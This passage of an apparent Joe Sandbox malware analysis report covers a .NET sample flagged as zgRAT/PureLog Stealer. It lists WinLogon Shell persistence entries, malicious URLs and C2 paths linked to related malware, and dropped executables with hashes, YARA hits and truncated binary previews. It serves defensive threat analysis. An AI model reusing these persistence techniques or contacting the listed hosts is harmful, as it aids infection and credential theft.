                                      18:18:52AutostartRun: WinLogon Shell "C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:19:01AutostartRun: WinLogon Shell "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:19:10AutostartRun: WinLogon Shell "C:\Users\user\Desktop\9XHFe6y4Dj.exe"

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.114.96.3SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                      • servicetelemetryserver.shop/api/index.php
                                      t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                      aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                      • main.dsn.ovh/dns/lovely
                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                      • filetransfer.io/data-package/DyuQ5y15/download
                                      zygWTMeQC2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 138231cm.n9shteam.in/CpuApiprotectTemp.php
                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                      • www.cc101.pro/ttiz/
                                      Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                      • vh26kx.pinboarddisplaced.com/?email=
                                      SMX-ACH0036173.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.casesrep.site/7z6q/
                                      http://sss-mmm-yyy.ru/Get hashmaliciousUnknownBrowse
                                      • sss-mmm-yyy.ru/assets/img/emoji/1f1ff-1f1fc.png
                                      DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                      • touxzw.ir/sirr/five/fre.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSWinFIG.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.53.8
                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.53.8
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.206.204
                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.206.204
                                      Download.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.53.8
                                      Aquantia.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 104.21.53.8
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.71.28
                                      AxoPac.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.189.211
                                      gtIVRm5dHl.htmGet hashmaliciousUnknownBrowse
                                      • 104.16.230.132

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AKEAUBbV.log12Vjq7Yv2E.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        7WyBcig6e3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          kBY9lgRaca.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                FMd6ntIhQY.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  5Aw2cV5m0c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      5WbBcHi91R.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        ggJWCFp2S3.exeGet hashmaliciousDCRatBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1168
                                                          Entropy (8bit):4.448520842480604
                                                          Encrypted:false
                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                          Malicious:false
                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.934572677073507
                                                          Encrypted:false
                                                          SSDEEP:48:6impt5xZ8RxeOAkFJOcV4MKe28dCdEokvqBHTuulB+hnqXSfbNtm:8WxvxVx98kvkFTkZzNt
                                                          MD5:52A714DFEA4A7A5CD8CD7EDB6DAFF2D3
                                                          SHA1:9188B1B4530044065E4B2D30E0F572408C9B4807
                                                          SHA-256:C73D9B9B4E81B9C67E45F8AAC10CF96EBD844BB57EA0E3064AD0266D6ECCCE28
                                                          SHA-512:24DA3D6A4D30F63CB51FFFC5BD21E9BFBF33093CCAEB2D18318F458F929DF8810CD73BE53F0BC6D60A15218F61A48729610296FDBA501EDFE0069597416328D6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y;.g.............................'... ...@....@.. ....................................@.................................x'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..P.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US. .......#GUID...0... ...#Blob...........WU........%3................................................................

                                                          C:\Program Files (x86)\Windows Mail\bd46efcfcb9ccc

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (312), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):5.785987586142407
                                                          Encrypted:false
                                                          SSDEEP:6:HGO3o6feIL7NgojW2YlWufh8IkeYo82pE20ODWpxHXdg12xA7R:mO35WIL7KojpMhkJo8kvDWpx+R
                                                          MD5:8EAE611F6B016BA74D235420934CE4C0
                                                          SHA1:407A2358BF5D8C88D5C353CEB091CDB2A335BE05
                                                          SHA-256:C508E29AC5E5CACEFDB55A7590C8730E73D20AA67A2D82BE4DB26320B808E37E
                                                          SHA-512:DA7C09525463C92B1D457F6E8C7DD652BE461906D5A9D9D60CC1474097CCFEEA84542448A93D188244828049D1F963866386463348669223B8CC3F0AC2854EF3
                                                          Malicious:false
                                                          Preview:l3GY2KQNjsDWUEfJ30O7gB72ngXXNlrSbgVFyXDvw6bKftHvsMcdaswk5OvWw2A7Au4xsaVgxdLkkwX3YmoAIO2tuvJklq836dKuzUCS16q6hMAJ128KN9yv2LD7Qu4GeRnGmmEEkWIMi5MivAttsyq7oY2nQEBHCkbPi3gOx3j01mN69fLQBKXqkqcNtaxfUBJ8e692de6yOzFBL6ou3vF2Mvo2bSfWFEfzdObDgTxhOicvkaCxwDmj5RvtRGbK9jsJTQi6elOj8iooS3SAQrkCc63Lcsva2miozSbU1FSLzDlXnHaXya4R

                                                          C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................t8.........n.8.. ....8...@.. ........................8...........@................................. .8.K.....8. .....................8...................................................... ............... ..H............text...ts8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B................P.8.....H............................-...8......................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{e...9....& ....8....*(.... ....~....{{...9....& ....8y......0.......... ........8........E............E...q... .......8....r...ps....z*8.... ....8.......... ....~....{....:....& ....8........~....(`...~....(d... ....?.... ....8r...~....(X... .... .... ....s....~....(\....... ....~....{....92...

                                                          C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Program Files\Uninstall Information\bd46efcfcb9ccc

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (791), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):791
                                                          Entropy (8bit):5.90803378664458
                                                          Encrypted:false
                                                          SSDEEP:24:0Rccc2NXhvr7GFsufLxpABnAwD0mhGERVQ:rNWGFRLABfP/M
                                                          MD5:CB6B6A3879943BFF324D292F0AA56219
                                                          SHA1:3B528AD67CFD37F34A78BBF030416609482836A5
                                                          SHA-256:E90057662317652E2151F630334E7F5B5042CE29D493C73A4CF7996292725318
                                                          SHA-512:1E93F82F27988E0F0C55282AF3AE4F0F76E36331A0890273EB387EC20AB1322DBBF823D368A31FF69545A2BE1A9D51BEF01D6478EB00D2E6B05B50829F546258
                                                          Malicious:false
                                                          Preview:dEfmVEr8aXNuYOtR4oZ6kiEVpLUH1ZWALRcnnmtNaAw42QAwk1PvEyM5AK6JujGBANjHwFoR5LfkvKcZLhhAKk5WFhndqkd03v3or3AeN702SmJ0sh8MCG0ZSMBPcLlUsoq9QxrShCwMtCDdXxvIlQyw5dWf1vCCWfKn5Kj40qpAUnqPIi1oactb03EwaLaw9t0N2ZhMN0S5lycRxHWS3Xm3wtxCGxdoP3AkxcWsBpbjKy0Cbw8TzI2lH6bJmfGaXoprx1eVvoRO6Dt83ulTyKzHAZd0BNGgiBMgIIPjSnhK0opENdQ13xlMyirXXnUiivp41NzufBALmoQVtZnh6Omva9rjb1LpT9mF9uMAnfW2xZkKSVo89wlTJ4e1fQTnzU2mBLW8Mn4b2u7AYhQGNNqhYT6EPVeWMsCch7IH8pwV1KbY6ed89NamoVNsPRs1IhOJrfdaYJHibUpO1hIv1gX8SZyMua1q64MT5RrbBCkzF2LUp90sJ79mKP1SrRq7RblgHVSjzquz5h3ZNdgujJg95kJpaYutVmhoQpMTqR2dMJqmWbENu6YI4mlhMnJb6AdT9OIiQMDSRDwv3gT8Th9ZOZtoDpHDIagLqXnHSg6i2F00z0nqTKHZBEFjeeelFAK0hlEf3LpxkbhIi3yNCbt7THKmSDmyBVc25ATOvIxIeUykg6BlqQjnQMhabcNzj1vP8oNijjc3old9SkFVCAHvwymsd3xS47jmijl2tcCGyp9othH1X2xitAdJCeFpwJ9qC0at8Nmk8B7Hz785w65

                                                          C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................t8.........n.8.. ....8...@.. ........................8...........@................................. .8.K.....8. .....................8...................................................... ............... ..H............text...ts8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B................P.8.....H............................-...8......................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{e...9....& ....8....*(.... ....~....{{...9....& ....8y......0.......... ........8........E............E...q... .......8....r...ps....z*8.... ....8.......... ....~....{....:....& ....8........~....(`...~....(d... ....?.... ....8r...~....(X... .... .... ....s....~....(\....... ....~....{....92...

                                                          C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Program Files\Windows Defender\Platform\bd46efcfcb9ccc

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):205
                                                          Entropy (8bit):5.758625743902791
                                                          Encrypted:false
                                                          SSDEEP:6:lf/DDw/RBNfX4kVbph/Ni8gUdL9SiWDdK3n:N//w/RHfX4ubD/OUxAin3n
                                                          MD5:EE1F14E391226AF7439E757E4EFB24B9
                                                          SHA1:3374AE5AEBF25D852A2261A34861390A4E4EAD96
                                                          SHA-256:4B5CDACAF4BBF7A2646D3679768420E1DB71FADED8BFEF606C653F9C35A680BF
                                                          SHA-512:B06019209A0721D4D02B0D9C83B92026FBCB1C2A1329890A77C3EAA845A79E2ED7022E1D1FA38A8DFEE187606A1BF6D7C65831A6F444872C209FCD335A4CB262
                                                          Malicious:false
                                                          Preview:bMRJi7mP0B5qfBsaXBFav9hXR9WlTWz3FyIcaHwqO4M74BKJtpef1Lbco32jlB5dMBkr3QAQOZL0wkdQyM1n1UC3XpxgPNEN8sv2adPdpOQbAkpEaluYJRl19qUNddBBU81Dzk0V6Y8nEk3wAtGocpDrH33uICAMNOHCslPzuZcvT8xZwhNtWXip4K65rGM4XvZzd1DZdQ3DN

                                                          C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................t8.........n.8.. ....8...@.. ........................8...........@................................. .8.K.....8. .....................8...................................................... ............... ..H............text...ts8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B................P.8.....H............................-...8......................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{e...9....& ....8....*(.... ....~....{{...9....& ....8y......0.......... ........8........E............E...q... .......8....r...ps....z*8.... ....8.......... ....~....{....:....& ....8........~....(`...~....(d... ....?.... ....8r...~....(X... .... .... ....s....~....(\....... ....~....{....92...

                                                          C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xec217c5f, page size 16384, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.6585780393318533
                                                          Encrypted:false
                                                          SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                          MD5:D43685D49FBAE1D9F08317AAACF55D26
                                                          SHA1:C553B709B9FF1F90A934D5567D0EE286E8616F37
                                                          SHA-256:29C9B19A55B59E5A70E0925288072DDB7C42EBDA20755B581AFAA3F33CAA7608
                                                          SHA-512:96BEEC421E0041E782E803F77A11859421100B4375CD21974752AE7752DFDE996A0E562EFEB0F5264F7CC57E469EA581F42C9316984A965D351A7CFCACFEC1C7
                                                          Malicious:false
                                                          Preview:.!|_... ...............X\...;...{......................0.z..........{..8....|m.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................m..8....|..................q8-f8....|m..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9XHFe6y4Dj.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1915
                                                          Entropy (8bit):5.363869398054153
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tqeRXJHxPWPPoiNqjJeEYdv.exe.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005753878328145
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                          Malicious:false
